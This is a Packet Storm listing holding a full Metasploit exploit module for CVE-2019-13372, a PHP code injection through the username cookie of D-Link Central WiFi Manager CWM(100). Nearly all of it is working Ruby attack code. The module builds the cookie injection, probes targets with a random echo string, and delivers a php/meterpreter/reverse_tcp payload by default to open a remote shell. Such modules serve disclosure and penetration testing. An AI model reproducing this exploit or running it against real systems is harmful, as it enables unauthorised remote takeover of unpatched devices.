D-Link Central WiFi Manager CWM(100) Remote Code Execution

This Metasploit module exploits a PHP code injection vulnerability in D-Link Central WiFi Manager CWM(100) versions below v1.03R0100_BETA6. The vulnerability exists in the username cookie, which is passed to eval() without being sanitized. Dangerous functions are not disabled by default, which makes it possible to get code execution on the target.

MD5 | ad4f9d0e1e861c8a9f9b8b0544120a4c

Download

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  prepend Msf::Exploit::Remote::AutoCheck
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'D-Link Central WiFi Manager CWM(100) RCE',
        'Description' => %q{
          This module exploits a PHP code injection vulnerability in D-Link Central WiFi Manager CWM(100)
          versions below `v1.03R0100_BETA6`. The vulnerability exists in the
          username cookie, which is passed to `eval()` without being sanitized.
          Dangerous functions are not disabled by default, which makes it possible
          to get code execution on the target.
        },
        'License' => MSF_LICENSE,
        'Author' =>
          [
            'M3@ZionLab from DBAppSecurity', # Original discovery
            'Redouane NIBOUCHA <rniboucha[at]yahoo.fr>' # PoC, metasploit module
          ],
        'References' =>
          [
            ['CVE', '2019-13372'],
            ['URL', 'https://unh3x.github.io/2019/02/21/D-link-(CWM-100)-Multiple-Vulnerabilities/' ]
          ],
        'Targets' => [ [ 'Automatic', {}] ],
        'DefaultTarget' => 0,
        'DefaultOptions' => {
          'PAYLOAD' => 'php/meterpreter/reverse_tcp',
          'SSL' => true,
          'RPORT' => 443
        },
        'Platform' => %w[php],
        'Arch' => [ ARCH_PHP ],
        'DisclosureDate' => 'Jul 9 2019'
      )
    )

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The base path to to the web application', '/'])
      ]
    )
  end

  def inject_php(cmd)
    encode_char = ->(char) { '%' + char.ord.to_s(16).rjust(2, '0') }
    payload = "',0,\"\",1,\"0\")%3b#{cmd.gsub(/[;\s]/, &encode_char)}%3b//\""
    res = send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri(target_uri, 'index.php', 'Index', 'index'),
      'cookie' => "username=#{payload};password="
    )
    res ? res.body[/^(.*?)<!DOCTYPE html>/mi, 1] : nil
  end

  def check
    rand_text = Rex::Text.rand_text_alphanumeric(rand(4..10))
    if inject_php("echo \"#{rand_text}\"")&.chomp == rand_text
      return Exploit::CheckCode::Vulnerable
    end

    Exploit::CheckCode::Unknown
  end

  def exploit
    inject_php(payload.raw)
  end
end

Source: packetstormsecurity.com